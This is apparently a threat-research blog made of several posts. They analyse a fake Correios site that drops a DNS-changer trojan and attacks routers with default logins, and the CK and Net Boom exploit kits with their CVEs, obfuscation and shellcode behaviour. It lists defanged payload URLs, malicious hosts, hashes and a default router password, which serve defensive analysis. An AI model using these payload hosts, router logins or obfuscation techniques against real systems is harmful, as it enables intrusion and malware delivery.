Fake Brazilian Postal Site Downloads DSN Changer Trojan and Launches Attacks on Routers

I ran across a site that tries to mess with system and router DSN settings.  The site includes hidden IFRMAES in order to access administration interfaces from within the local area network.  The site also uses a malicious JavaScript to spawn a fake Flash update window that downloads a DNS changer trojan.  These types of attacks are nothing new, but the domains and files used in these attacks do not suffer from poor web reputations or trigger many AV alerts.

The attacks begins with a malicious site masquerading as a Brazilian Postal Service (Correios) site for searching zip codes.  The malicious site is buscacepcerto[.]com.   The legitimate site is buscacep.correios.com.br.  The malicious site creates an IFRAME that displays the legitimate site in the browser while downloading a malicious JavaScript file and contacting a second malicious site from a hidden IFRAME.  The site invoked by the IFRAME is filmegratistv.tempsite[.]ws/altear-dns/index.php.  The malicious JavaScript code was imported from buscacepcerto[.]com/init.js.

iframes

The JavaScript file downloads a DNS Changer disguised as a Flash Player update window.

DnsChanger

The installer download button contacts shortened URL goo.gl/XB5O8v which resolves to www.buscacepcerto[.]com/AdobeFlash.exe (SHA1 4acf91b721c16e46919c73102d4bc0fa8ef218ec).

fakeInstaller

If the user executes the files, it makes the following changes to the system registry.

HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{101AD58A-72E3-4831-9F1E-01C7C72E2FAB} ], Value Name: [ NameServer ], New Value: [ 199.201.108.11,8.8.8.8 ]HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{1AD45B38-4060-4F73-BB1E-A0439A2D97EB} ], Value Name: [ NameServer ], New Value: [ 199.201.108.11,8.8.8.8 ]        HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{76341E73-35E8-4915-81A7-53DE19F2314B} ], Value Name: [ NameServer ], New Value: [ 199.201.108.11,8.8.8.8 ]HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{CD1622D3-0BA5-4EAB-A1CB-1D28B1CA5B98} ], Value Name: [ NameServer ], New Value: [ 199.201.108.11,8.8.8.8 ]

The secondary DNS address, 8.8.8.8, belongs to Google.  I could not find any information about the primary address 199.201.108.11.  Only two AV vendors flag the executable as malicious in Virus Total.

In addition to the DNS Changer trojan, the hidden malicious IFRAME connecting to filmegratistv.tempsite[.]ws/alterar-dns/index.html launches a Domain Name System (DNS) attack on the router from ten additional hidden IFRAMES. These IFRAMES attempt to login to unsecured routers or logon to routers configured to use known default user names and passwords from inside of the LAN.  As shown below, username ‘admin’ and password ‘gvt12345’, for example, target the Dlink 500b-II router.

routerAttacks

Neither the initial malicious URL, the URLs from the hidden IFRAMES, or the IP Address of the bogus DNS server are widely recognized as malicious.  Virus Total URL scans for buscacepcerto[.]com returned no reputation issues.  Likewise, Virus Total URL scans for filmegratistv.tempsite[.]ws/altear-dns/index.php had no reputation issues.  The Virus Total URL scan for the IP of the malicious DNS server also had no reputation issues.  As mentioned earlier, the DNS Changing trojan executable masquerading as an Adobe Flash installer received only two malicious detections in Virus Total.

 

REFERENCES:

http://jsunpack.jeek.org/?report=3386414e290ca6e75ca335358b438ec7a8f351ac

http://anubis.iseclab.org/?action=result&task_id=1c1c8ebbce435f2441d67c248f0bf63f1

https://www.virustotal.com/en/file/37e5df6628c127bdde487c11a89e0ead4c7b6fc7915bf097bc82e1e8d4d93796/analysis/1409501460/

 

CK Exploit Kit in Late 2013

A new version of the CK Exploit Kit served targeted attacks using a CVE-2013-3897 exploit since at least 20 OCT 2013 and as late as 01 NOV 2013. Like earlier CVE-2013 3897 samples discovered in the wild, the exploit targeted only Internet Explorer 8 with Korean or Japanese language settings. The new CVE-2013-3897 exploit was one of six possible attack vectors used in the updated CK Exploit Kit.  The other new exploits were for CVE-2013-0422 and CVE-2013-0634.  An exploit for CVE-2012-4792 was observed earlier, but appears to have been replace by the new CVE-2013-3897 exploit in.  A rough diagram of the new CK Exploit Kit serving CVE-2013-3897 is provided below.  Exploits added since the middle 2013 are outlined in red.

ckeknov-13

In the index page, the section checking and setting cookies is pretty much the same as the code discussed in earlier post.  This is especially evident in the variable named CK_WM and the cookie name starting with CKADIM.  An explanation of the variable named CK_WM is provided in my 14 April and 22 May 2013 posts.  The significance of the cookie names starting with CKADMIN are describe in my 12 June 2013 post.

 cookieCheck

The cookie functions are followed by a long block of code that was packed and encrypted using the same methods observed in earlier versions of the CK Exploit Kit.  Code for selecting and calling one of the three Java exploits are first encrypted using a Java Script implementation of the Tiny Encryption Algorithm (TEA) and packed using a variation of Dean Edwards Packer.  The new versions of the kit features the comment string “caihong vip” in the function call to the unpacking function while earlier kits included the string “ck vip” or “jsck vip” in the function call. Perhaps the new sting indicates that the authors have changed the name of the kit to Cai Hong.

depacker_call

The packed and encrypted block of code for the Java exploits in the index file is followed by separate code for the browser exploits.  If none of the conditions for the Java exploits are met, the index file code progresses to the Internet Explorer (IE) exploits for IE8, IE7 and IE6.

 IEnoJava

The CVE-2013-3897 exploit can be found in the file ZZ.HTML intended for IE 8 browsers.  Like earlier CVE-2013-3897 exploits found in the wild, the exploit code in ZZ.HTML is only run if the browser is IE 8 and language is set to Korean or Japanese.

zzEI8KoJa

Almost all of the code in ZZ.HTML was the same as the code found in the zero-day samples discovered in the wild by Spider Labs at 1.234.31.154/mii/guy2.html.  The differences were in the shell code and the page title.  The HTML title in the ZZ files was “show” while the HTM title in the GUY2 file was “naver”.  The shell code in the ZZ files was obfuscated by replacing “%u” with “wm”.  The Shell code in the GUY2 file was obfuscated using XOR 148 encoding.  The shell code in the ZZ file consisted of about 125 Unicode values while the shell code in the GUY2 file consisted of 1678 Unicode values.  The GUY shell code included a lot of instruction to detect and disable common Korean anti-virus applications not found in the ZZ shell code.  The ZZ shell code sample  shown below used URLmon.dll to download and executable file admin22.exe.

sc

 The ASCII version of this shell code is shown below.

sctxt

The dropped file, admin22.exe (MD5: cb3148baab0fe10aa998215feab8666c), was identified in Virus Total as [Microsoft] Trojan:Win32/Urelas.A.  The admin22.exe dropped $$WindowsXp.bat (MD5: 452e1795177453fec20db3b9e925523c) and KillWindowProtect.sys (MD5: aed685fafd6f5bdab84a8d8152d637aa).  References to SOFTWARE\Microsoft\Office\12.0\Groove and the Grove library GR99D3~1.DLL led me to think this file may implement a privilege escalation by exploiting the CVE-2010-3146 vulnerability in Microsoft Office Groove 2007.

 

SOURCES

Sample of the new CK variant with CVE-2013-3897
http://jsunpack.jeek.org/?report=ce7bb58bfcbc512c6e60554f9ef939326c9d7054
https://www.virustotal.com/en/ip-address/121.254.169.133/information/

Early reporting on CVE-2013-3897
http://blog.spiderlabs.com/2013/10/another-day-another-ie-zero-day.html
http://blog.spiderlabs.com/2013/10/ie-zero-day-cve-2013-3897-technical-aspects.html

Samples of CVE-2013-3897 caught in the wild
http://jsunpack.jeek.org/?report=847afb154a4e876d61f93404842d9a1b93a774fb
http://jsunpack.jeek.org/?report=07058210b793a02e19ce1f506d23e91e0db8cba0

Earlier CK variant serving 2012-4792
http://jsunpack.jeek.org/dec/go?report=fb98c218a8d5fec52a5d612ff428bc5ceaa27331

Sandbox of admin22.exe (MD5: cb3148baab0fe10aa998215feab8666c)
https://malwr.com/analysis/Nzg4OTQ1NWJlMTJhNGE4NDhiNmFhNzYwODY0NjdjMGI/

CK VIP Cookies and Botnets

The Chinese CK Exploit Kit was initially deployed in April 2012.  Exploit code generated from the CK Kit was identified by file, variable and function names based on the strings CK and CKWM.  The name of the site is probably an abbreviation of CK Wǎng mǎ (CK网马) which translates to CK Network Trojan.  The web site CKWM.NET is affiliated with the CK Exploit Kit. The CK Kit is a decedent of the Net Boom NB Exploiter Kit produced from late 2010 through late 2011.  The registrant of CKWM.NET is the same as the registrant of a site 1874.CC that distributed the Net Boom Kits.  The CKWM.NET site is built on a popular Chinese forum software kit and incorporates a publically available plug-in that allows administrators to sell VIP memberships with special privileges to forum users.  CKWM.NET includes a page that lists the site’s VIP members.  The VIP member user names match cookies left by the CK Exploit Kit.  I believe that each VIP user listed in CKWM.NET pages represents a botnet, and I suspect that the entire site provides a covert means to rent botnets originally harvested by the CK Exploit Kit.

Since 2007, major Chinese Exploit Kits have shared the following two attributes – explicit use of the product name in the exploit code and use of sales and support web sites to overtly market the kits.  In 2007 through 2010, exploits from the Anhey Kit included numerous references to AHWM and CUTEQQ.  AHWM was an abbreviation for Anhey Wang Ma (Network Trojan) and CUTEQQ was a reference to The Anhey marketing site, CuteQQ.cn.  In 2010 through 2011, code from the Silver Fox Exploit Kit included references to SVFOXWM, SFWM and SVFOX.NET.  SVFOXWM and SFWM were abbreviations for Silver Fox Wang Ma and SVFOX.NET was the domain name for the site that marketed and supported the Silver Fox Exploit Kit. In 2011 through 2012, code from the Net Boom NB Exploiter Kit included references to NBWM and 1874.cc.  NBWM was an abbreviation for Net Boom Wang Ma and 1874.cc was the web site used to market and service the Net Boom Kit.  Currently, the CK Exploit Kit code uses references to CKWM and is linked to the CKWM.NET site.

My 14 April 2013 post titled “The CK Exploit Kit – Net Boom’s Metamorphosis” argued that the CK Exploit Kit replaced the Net Boom Exploit Kit in early 2012.  The analysis identified several consistencies in the exploit code used by the two kits, but did not discuss links between the web sites supporting the two kits addressed in this post.  Specifically, the two kits share the exact same domain registration information as shown below.

registr

The creation date for the two web sites corresponds with the first release of Net Boom in November 2010, the first appearance of CK in April 2012, and the subsequent migration from Net Boom to CK in April 2012.  The 1874.CC site has the appearance of a legitimate software vendor but made no attempt to hide the malicious purpose of its products.  The password protected CKWM.NET site, however, made no explicit references to exploit kit sales or service. A screen shot of 1874.CC is presented below.

1874_cc

Unlike 1874.CC, the CKWM.NET shown below has the appearance of a generic internet forum site.

ckwmdotnet

CKWM.NET is powered by version 8.5 of PHPWind, a popular forum application in China.  The background image featuring clouds, grass and flower petals blowing in the wind may be a default background image for the PHPWind application.  The CK EXPLOIT logo in the upper left corner of the page, conversely,  is from a separate image file that is unique to the CKWM.NET site.  The unique logo from the site is shown below.

CKlogo

The use of the word “exploit” is consistent with the hypothesis that the site is distributing malware.  The green shield featured in the image has the appearance of icons used by many anti-virus and network security vendors.  Most vendors, however, combine a check mark with the green shield icon and use a yellow or red shield with an explanation point.  The green shield with the check mark indicates that a file or internet resource is safe while the yellow or red shield with an explanation point indicates that a file or internet resource may be harmful.   So, what would a green shield with an explanation point indicate?  Perhaps it signifies a file or resource that is harmful but not detected by anti-virus products.

The site included a VIP membership page that provides much more evidence of malicious activity.  The VIP page is created using the publically available PHPWind VIP Member Center (VIP会员) plug-in.  The screen shot below shows a VIP member page from CKWM.NET.

ckvipmembers

The VIP Member Center plug-in allows the site administrator to collect fees in exchange for special privileges to paying forum users.  Some of the paying VIP members listed on the CKWM.NET page include ADMIN, JURANALEN, JTAHEATEH, XIAOYU, KYDOWN, SAYRYWN, 306953568, DADAYE, XIAOHUA and XNJ.  Who are these people?  An intuitive hypothesis is that these user names represent a community of users sharing a common interest such as online gaming or computer security.   An alternative hypothesis is that the VIP member names do not represent actual people at all; but rather, are names given to botnets harvested using CK Exploit Kit attack code.  Evidence supporting this hypothesis is explored below.

One feature of the CK Exploit Kits was the inclusion of variations of the comment string /*CK VIP*/ in the code’s function calls to an open source Java Script packer.  This code is described in my 22 May 2013 post.  I believe these comments are references to the CK VIP Member page found on CKWM.NET.  The index page for the CK web exploits use distinctive cookies created from the concatenation of the string CK and the VIP user names listed on the CKWM.NET VIP Member page.  For example, the VIP member user name JURANALEN is present in the cookie string CKJURANALEN.  The following five images show examples of the relationship between the VIP usernames and the cookies used in CK exploit code for CKADMIN,CKJURANALEN, CKJTAHEATEH, KYDOWN and CKXIAOHUA.

vip-ckadmin

vip-ckjuranalenn

vip-ckjtaheateh

vip-ckdown

vip-ckxiaohua

The site includes another VIP page that is password protected.  It is likely that the page used in this analysis is out of date.  The latest VIP member starting date on the page was 17 July 2012.  More recent CK VIP cookies were probably added after July 2012.  The CK exploit kit cookie CKTTCYWAXX, for example, was first seen in October 2012 and continued to be used until at least April 2013.

 

CONCLUSIONS:

The CK Exploit Kit is associated with the CKWM.NET site that is probably used for sales and service.  The CKWM.NET domain name registration information is exactly the same as the registration information for a known Chinese malware site named 1874.CC.  Previous posts explained that the 1874.CC site is associated with the Net Boom Exploit Kit, and the Net Boom Exploit Kit evolved into the CK Exploit Kit.

Unlike earlier Chinese malware sales and service sites, the relationship between CKWM.NET and the CK Exploit Kit is not immediately obvious.  The CKWM.NET site name and logo provide some speculative evidence about the relationship between the site and the malware exploit kit.   A page listing CKWM.NET VIP members provides  solid evidence linking the site to CK Exploit code.

Despite the analysis presented in this post, it is still unclear exactly how the site is used to sell malware code or services to cyber criminals.  Unlike earlier Chinese exploit kit vendor sites I have seen, CKWM.NET does not seem to be advertising an exploit code generator.  Perhaps the CKWM site provides botnets for rent.  These botnets are identified by the cookies used by the initial exploit vectors provided by the CK Exploit code.  The VIP Member Center plug-in used by the CKWM.NET site provides a means for facilitating financial transactions between the bot herders and cyber criminals.

 

REFERENCES:

The CK Exploit Kit – Net Boom’s Metamorphosis (CK Exploit Kit and NB Exploit Kit)

CK Exploit Kit in Early 2013 (CK Exploit Kit)

Anhey Menagerie (AHWM and CUTEQQ.CN)

Silver Fox Gallery (SVFOXWM and SVFOX.NET)

Net Boom Kits and Signatures (NBWM and 1874.CC)

The Last Net Boom Exploit Packs (NBWM and 1874.CC)

http://w3patrol.com/d/1874.cc (1874.cc domain registration)

http://w3patrol.com/d/ckwm.net (ckwm.net domain registration)

http://www.phpwing.net (PHPWind Site)

http://www.phpwind.net/read/1349115 (VIP Member Center Plug-in)

http://www.jsunpack.jeek.org/ (repository for code featuring CK VIP cookies)

 

 

 

 

 

 

 

CK Exploit Kit in Early 2013

The Chinese CK Exploit Kit was initially deployed in April 2012.  Exploit code generated from the CK Kit was identified by file, variable and function names based on the strings CK and CKWM.  The CK Kit is a decedent of the Net Boom NB Exploiter Kit produced from late 2010 through late 2011 as described in my 14 April 2013 and 30 March 2013 posts.  The initial versions of the CK included a JAVA CVE-2011-3544 exploit, Flash CVE-2012-0611, CVE-2012-2140 and CVE-2012-0754 exploits, and MSIE CVE-2010-0806 and CVE-2012-0003 exploits.  By early 2013, exploits for JAVA CVE-2012-4681, Flash CVE-2012-1535 and MSIE CVE-2012-1889, and CVE-2012-4969 were added to the package.  Exploits for MSIE CVE-2010-0806 and CVE-2012-003 were removed from the package.  Exploits for JAVA CVE-2011-1344, Flash CVE-2012-0754, Flash CVE-2012-2140 and Flash CVE-2011-0611 were retained.   The figure below approximates the state of the CK Exploit kit in May 2013.

ck2013

 

The boxes outlined in blue represent exploits that were carried over from the initial CK Exploit Kit.  The boxes outlined in red represent exploits added to the kit by early 2013.  The gray-filled boxes represent exploits removed by early 2013.

Google cached a full set of CK files in early March 2013.  The cache lists files served by a  HTTP File Server (HFS) and accessed through fast flux domain names based on “*.*fj.gs.net.cm”.  The files show what a complete CK exploit package looked like in early 2013 but were not available for download and analysis.  The site “wswm.0412game.com”, (210.56.53.34), included all of the exploits listed above except CVE-2012-4681.  The CK exploit for CVE-2012-4681 was served from several sites at including kwhts.com (211.43.203.23) on 10 March 2013, asfa2d2d.info (192.30.136.89) on 24 March 2013, and qichejiaodian.info (199.114.244.115) on 11 April 2013.  These servers offered the same CVE-2011-3544, CVE-2012-1889 and CVE-2012-4969 exploits as the 210.56.53.34 server in addition to the CVE-2012-4681 exploit, but did not include the Flash exploits served from 210.56.53.34.

Primary Encryption and Obfuscation Methods used with the New Exploits

Files delivering the CVE-2012-4681, CVE-2012-1535, CVE-2012-1889 and CVE-2012-4969 exploits were encrypted using the Tiny Encryption Algorithm (TEA) that incorporated a Base64 encoding algorithm.  The kit had used TEA encryption since at least October 2012 as seen here.  More information and JS code samples for TEA is available on the Movable Type LTD site (movable-type.co.uk).

The TEA cipher text and decryption code for the CVE-2012-1535, CVE-2012-1889 and 2012-4969 exploits were obscured by Dean Edward’s Packer.  The string “eval(function(p,a,c,k,e,r)”  in the script code normally indicates the presence of Dean Edward’s Packer.  The CK exploit kits obscured this string by impregnating it with comments based on CK VIP.  The kit used this method of obfuscation since at least September 2012 as seen here.   Some current samples are shown below.

ckvip

Some samples of decrypted code for these exploits are discussed below.  The files were unpacked using jsbeautifier.org and the encryption was broken using JS TEA code from movable-type.co.uk.

CVE-2012-4681 Exploit Added to the Index page

The index page for the updated CK Exploit Kit added exploit code for Java CVE-2012-4681 to the existing Java CVE-2011-1354 exploit.  These two exploits are called from an index page often named CK.HTML or CC.HTML.  The exploit for CVE-2012-4681 may have been added as early as 25 December 2012.  A decrypted sample taken from qichejiaodian.info on 11 April 2013 is shown below.

ck2013Index

 

CVE-2012-1535 Exploit Added to the 1.HTML

The original version of the CK Exploit Kit included a file named 1.HTML that was called from the index page and used to deliver the appropriate Flash exploit to the victim’s browser.  The new version of the kit added files LOG.HTML and WMCK.SWF that implemented a CVE-2012-1535 exploit to the 1.HTML file.  The exploit for CVE-12012-1535 has probably been in use by CK since at least 9 September 2012 as seen here.  A decrypted copy of LOG.HTML taken from wswm.0412game.com on 30 April 2013 is shown below.

cklog

LOG.HTML calls to WMCK.SWF.  Virustotal results for file WMCK.SWF confirms that the SWF file contains a CVE-2012-1535 exploit.

CVE-2012-1889 Exploit Replaced the CVE-2010-0806 Exploit

The exploit for MSIE CVE-2012-1889 was contained in the file named ZIP.HTML.  It replaced the CVE-2010-0806 exploit that was contained in a file named POP.HTML. A sample of the CVE-2012-1889 exploit was served by qichejiaodian.info on 11 April 2012.  ZIP.HTML provided an obfuscated payload URL in the array variable SS that was declared before the packed and encrypted block as shown below.

ckzippkd

The deobfuscation code for the payload URL, together with the shellcode for the exploit, was hidden in the Dean Edward’s packed and TEA encrypted block of the code.  Deobfuscation reveals the presence of Unicode encoding of ASCII characters further obscured by XOR BD encoding.  The plain text version of the packed and encrypted code block is shown below.

ck2013ZipSc

Function CKCKCKCKCKCKCKCK deobfuscates the payload URL.  In the sample observed at qichejiaodian.info/zip.html, the payload string breaks out to hXXp://down.3dianshi.com/smss.txt. The unpacked and decrypted shellcode was contained in the variable CKWMCKWM.  The shellcode was further obfuscated with padding strings that replaced “%u” characters with the string “cgTw”.

The heap spray and trigger code for the CVE-2012-1889 exploit in ZIP.HTML was presented plain text below the packed and encrypted block of code.  The heap spray was implemented using Alexander Sotirov’s JavaScript Heap Exploitation library as described here.  The trigger code is shown below.

ckziphstrg

 

CVE-2012-4969 Exploit Replaced the CVE-2012-0003 Exploit

An exploit for MSIE CVE-2012-4969 was included in the early 2013 versions of the kit. The exploit was initiated through WIN.HTML and triggered from WIP.HTML.  It replaced the CVE-2012-0003 exploit contained in MOP.HTML.

The obfuscated payload URL was provided in the array variable OMG and part of the heap spray code was provided at the bottom of the file as shown below in the code fragment from qichejiaodian.info/win.html on 11 April 2013.  An IFrame called the trigger code from WIP.HTML.

ckwin-outline

The CVE-2012-4696 trigger code from WIP.HTML, with its colorful function names, is shown below.  The names HOLY and SHIT follow the payload variable named OMG.  Taken together, the sequence of names probably equates the slang expression “Oh my god, Holy Shit!”  This bit of humor indicates that the authors of the code have some comfort with American English colloquialisms as well as Heap-based buffer overflows.

ck2013WipTrigger

The main body of the shellcode and deofuscation code for the payload URL were hidden by encryption from TEA and obfuscation from Dean Edward’s Packer.  The payload URL decryption function (BMW) and shellcode are shown below.

ck2013WinSc

The unpacked and decrypted shellcode was further obfuscated with padding strings that replaces “%u” characters.  Deobfuscation reveals the presence of Unicode encoding of ASCII characters and XOR BD encoding.  The function BMW deobfuscates the payload array variable OMG resulting in the URL hXXp://down.3dianshi.com/smss.exe. The Scumware.org database shows that down.3dianshi.com resolved to same IP (199.114.244.115) as qichejiaodian.info on 12 April 2013.  The file down.3dianshi.com/smss.exe served from 199.114.244.115 had a MD5 value of 0D443957B5F689B94BC0717AA753DC9E.  Analysis of that file by ThreatExpert on 12 April 2013 shows network activity linking back to 199.114.244.115 and producing traffic indicative of a Gh0st Rat infection as shown below:

gh0st

CONCLUSIONS

By early 2013, exploits for JAVA vulnerability CVE-2012-4681, Flash vulnerability CVE-2012-1535 and MSIE vulnerabilities CVE-2012-1889 and CVE-2012-4969 were added to the CK Exploit Kit.  Exploits for MSIE CVE-2010-0806 and CVE-2012-003 were removed from the package.  The exploits for JAVA CVE-2011-1344, Flash CVE-2012-0754, Flash CVE-2012-2140 and Flash CVE-2011-0611 were retained. Most of the new exploit have been in use by the CK kit since at least September 2012.  The new CVE-2012-4969 exploit was included since at least December 2012.

The kit continued to use variations of CK and CKWM in its file, variable and function names as seen in the samples discussed in this post.  The index page used CK.HTML as the file name and CKTTCYWAXX as a cookie value.  The new CVE-2012-4681 exploit included a JAR file named WMCK.JPG, a JAVA class named CVE2012XXXX.CKWMCC.CLASS, and variables named CKURL and WMCK.  The new CVE-2012-1535 exploit included a Flash file named WMCK.SWF. The new CVE-2012-1889 exploit included function and variables named CKABC, CKDEF, CKHGI, CKWMCKWM and CKCKCKCKCKCKCKCK.  Multiple exploits included the variable name CKABC and the padding strings /*ck vip*/, /*vip ck*/ or /*jsck vip*/.

The kit adopted new encryption techniques using the publically available Tiny Encryption Algorithm (TEA) and new obfuscation techniques using the publically available Dean Edwards Packer.  The kit also used Alexander Sotirov’s publically available heap spray code. In one instance, exploits from the kit downloaded a Gh0st Remote Access Tool (RAT).  The Gh0st RAT communicated with the same IP that served the exploit files.

CK’s decrypted Java exploits include signatures associated with the Gongda Exploit Kit.  The HTML and source code for those Java exploits, however, are readily available on the web.  These offerings frequently retain references in the code associated with the Gongda Exploit Kit.  CK’s use of Dean Edward’s Packer alongside TEA Encryption is shared with the Kaixin Exploit Kit.  Both kits use the distinctive variable, AVgHbu2f,  to hold the value UNESCAPE.   I am not an expert on either the Gongda Exploit Kit or the Kaixin Exploit Kit, but I welcome any comments you may have about the similarities or dissimilarities of these kits.

REFERENCES

Previous posts for the CK Exploit Kit:

http://www.cysecta.com/2013/04/14/the-ck-exploit-kit-net-booms-metamorphosis/

http://www.cysecta.com/2013/03/30/the-last-net-boom-exploit-packs/

Open Source Tools References

Tiny Encryption Algorithm (TEA) with Base64 encoding

Dean Edwards Packer

JSBeautify

Alexander Sotirov’s JavaScript Heap Exploitation library

Data Sources:

Search Cache for *.*fj.gs.net.cm

wswm.0412game.com – JSUnpack

qichejiaodian.info – JSUNPack

Early Sample of Dean Edwards Packing - SEP 2012

Early sample of TEA Encryption – OCT 2012

Early Sample of CVE-2012-4186 – DEC 2012

Early Sample of CVE-2012-1535 – SEP 2012

Virustotal results for file WMCK.SWF (2012-1535)

down.3dianshi.com – Scumware

Gh0st Rat – ThreatExpert

 

 

 

 

The CK Exploit Kit – Net Boom’s Metamorphosis

The CK Exploit Kit

Evidence collected from network security traffic repositories revealed a Chinese exploit kit, CK,  that was initially deployed in April, 2012.  Analysis shows that it is a descendent of the Chinese Net Boom NB Exploiter kit described in my 23 February 2013 and 30 March 2013 posts.  The initial versions of the kit included a JAVA CVE-2011-3544 exploit, Flash CVE-2012-0611, CVE-2012-2140 and CVE-2012-0754 exploits, and MSIE CVE-2010-0806 and CVE-2012-0003 exploits.  The latest version of the kit, observed March 2013,  probably included JAVA 2012-4681 and CVE-2011-3544 exploits, Flash CVE-2011-0611, CVE-2011-2140, CVE-2012-0754 and CVE-2012-1535 exploits, and MSIE CVE-2012-1889 and CVE-2012-4969 exploits.

The CK Exploit Kit has received some limited attention primarily from Korean Security Bloggers.  On 14 February 2013, Korean Blogger Sea, (바다란), described how a compromised Japanese web site (cnblue.jp) for a popular Korean rock band was directing visitors to malware that was generated by the CK kit.  On 28 March 2013 a Korean Blog, Hakawati Security Labs, described CK deofuscation.  Little additional information about the kit is available.  The purpose of this post is to investigate the origins of the CK Exploit kit to determine how it may have been deployed in the recent past.

Early 2012 CK Exploit Kits

Exploit packs generated from the CK Exploit kit began to replace packs from the Net Boom kit in April 2012.   A good example of this transformation can be seen in network security traffic repositories for the IP addresses 61.159.225.18.  Domains resolving to 61.159.225.18 were serving exploit packs generated from the Korean language release of the Net Boom NB Exploiter version 2.8.4.6 in April and May.  Details about Net Boom version 2.8.4.6 are available in my 30 March 2013 post.  By late May, 61.159.225.18 replaced the Net Booms packs with CK exploit packs.  The same CK packs were also observed on several other mostly Chinese sites listed below in early 2013.

58.221.31.149 (CN)
60.190.172.187 (CN)
61.155.154.117 (CN)
61.159.225.18 (CN)
67.198.173.122 (US)
112.213.109.89 (HK)
113.107.95.66 (CN)
121.12.169.152 (CN)
180.153.98.34 (CN)
218.65.30.10 (CN)
218.95.39.55 (CN)
218.95.38.89 (CN)
222.186.52.116 (CN)

The first CK Exploit packs included a JAVA CVE-2011-3544 exploit, Flash CVE-2012-0611, CVE-2012-2140 and CVE-2012-0754 exploits, and MSIE CVE-2010-0806 and CVE-2012-0003 exploits.  The Java exploit was found on the landing page.  It was encrypted using an open source Tiny Encryption Algorithm (TEA) and packed using the open source Dean Edward’s Packer.  The code used to detect the Java version (TOP.JS) is based on Oracle’s DEPLOYJAVA script. If the victim browser did not meet the criteria for the Java exploit, it was directed to file 1.HTML to be evaluated for one of the three Flash exploits.  If the victim browser did not meet the criteria for one of the Flash exploits, it was direct to one of the two MSIE exploits.  The files and logic behind the initial CK packs is shown below.

CKPack032013

File names CK.SWF and CK.MID are obvious references to the CK Exploit kit.  CKWM.JPG and CKWM.SWF are probably abbreviations for Chinese Pinyin “CK Wǎng mǎ” which translates to “CK Network Trojan”.  The file names may also reflect the web site name CKWM.NET which appears to be associated with the CK Exploit kit.  Several other variations of CK and CKWM can be seen in the variable names and function names used by the exploit code.  A few examples are CKWM, CKWMX, CKCODE and CK0.  Some other noteworthy variable and function names from the landing page include POLO, COLO, OSOME and NAVER.  A few noteworthy names from the main Flash exploit page include APPLE and NOKIA.

 

Links to Net Boom NB Exploiter

Much of the code in the new CK landing page was dedicated to decrypting the CVE-2011-3544 exploit code and detecting the browser Java version.  Striped of all of the code relating to the new CVE-2011-3544 exploit, the landing page looks very similar to the old Net Boom landing pages.  The variables named POLO, COLO, OSOME and the function name NAVER were retained from Net Boom as seen in the following two code fragments from IP 61.159.225.18 in early 2012.  Note that the Net Boom variable NBSUN was changed to CKWM8.  Additionally, both set of landing pages used web statistics generated from 51yes.com.

CK-NBIndex

Flash files NB.SWF for CVE-2011-0611 and NBWM.SWF for CVE-2011-2140 were replaced by file names CK.SWF and CKWM.SWF, respectively. These changes can be seen in the file 1.HTML – a file used by both packs to match a victim browser with an appropriate Flash exploit.  The CK version appears to be a modified copy of the older Net Boom version of 1.HTML as shown below:

CK-NB1html

The CK file OOP.HTML file for CVE-2011-0611 was obfuscated using a Bitwise OR with a decimal value of eight.  After de-obfuscation, it’s clear that the CK CVE-2011-0611 exploit was taken from code generated by Net Boom NB Exploiter.  The authors made a few efforts to associate the old code with the new CK Exploit kit.  The variable name CKWM in OOP.HTML replaced the variable name NETBOOM.  The variable name CKCODE replaced the variable name NBCODE.  The function name NB() was replaced by the function name CK0().  The reference to file NB.SWF was replaced with a reference to file CK.SWF.  Some old Net Boom references such as NB, NBWM, NBPOWER and NBLOL, however, remained in the code as shown below.

oop

The CK exploit code for the CVE-2010-0806 exploit is nearly identical to the Net Boom NB Exploiter version 2.8.4.6 exploit code for CVE-2010-0806.  The file P1.JS, P2.JS, P3.JS, P4.JS and P5.JS called by POP.HTML in the CK version of the CVE-2010-0806 exploit are nearly identical to the files I1.JS, I2.JS, I3.JS, I4.JS and I5.JS called by IE6.HTML in the Net Boom version of the exploit described in my 30 March 2013 post.

pop

popjs

 

Conclusions:

The analysis presented in this post provides evidence supporting the idea that the Net Boom Exploit kit was transformed into a new Kit Named CK Exploit in early 2013.  The last deployment of  NB Exploiter version 2.8.4.6 ended in March 2012.   Vestiges of NB Exploiter version 2.8.4.6, however, were clearly visible in a new kit named CK Exploit.

One of the most interesting things about Net Boom’s NB Exploiter version 2.8.4.6 was the fact that it was a Chinese product available with Korean language support and can bundled with DDOS applications.  If CK Exploit is, in fact, the descendent of  NB Exploiter version 2.8.4.6, then it would be reasonable to expect that a Korean language version of CK Exploit with integrated DDOS applications exists as well.  I think that a hypothesis worthy of exploration is that the CK Exploit kit may have played a role in the March 2013 cyber attacks against South Korea.

References:

CN Blue Japanese website Serving Malware  http://p4ssion.com/341

CK VIP Deofuscation http://hidka.tistory.com/entry/CK-VIP-Deofuscation

Clean-mx.de results for IP 66.174.244.154 http://support.clean-mx.de/clean-mx/viruses.php?ip=66.147.244.154&sort=first%20desc

Net Boom Landing Page, Early 20123 http://jsunpack.jeek.org/dec/go?report=ef593039e29ba9c2105d7abc603cda5f14025426

CK Landing Page, May 2012 http://jsunpack.jeek.org/img/?report=a45ac6cff1e131319250833e662f3c2ff139ac64

 

 

The Last Net Boom Exploit Packs

Net Boom NB Exploiter is an exploit kit that was produced between 2010 and 2011.  My post “Net Boom Kits and Signatures” from 23 February 2013 provides details about the kit, web-sites that distributed the kit, and the Chinese and Korean versions of the kit.  The last known Net Boom Exploit Kit was the Korean language NB Exploiter Version 2.8.4.6.  Version 2.8.4.6 offered nine different exploits for vulnerabilities including CVE- 2010-0806 (MS10-018), CVE-2010-3962 (IE CSS), CVE-2011-1255 (MS11-050), CVE-2011-0611 (Flash 10.2.153), CVE-2011-2110 (Flash 10.3.181) and CVE-2011-2140 (Flash 10.3 0day).   A screen shot of the Korean language NB Exploiter Version 2.8.4.6 is shown below:

NBEv2.8.4.6

The kit provided an option to deploy a package of exploits using code to determine which exploit was best suited for a given victim’s configuration.  I believe that there will be some value in examining the exploit code with a particular emphasis on the logic that determines which exploit in the package gets served to the victim.  Examining these files may help to determine tactics, techniques and procedures (TTP) unique to the authors or users of Net Boom exploits.

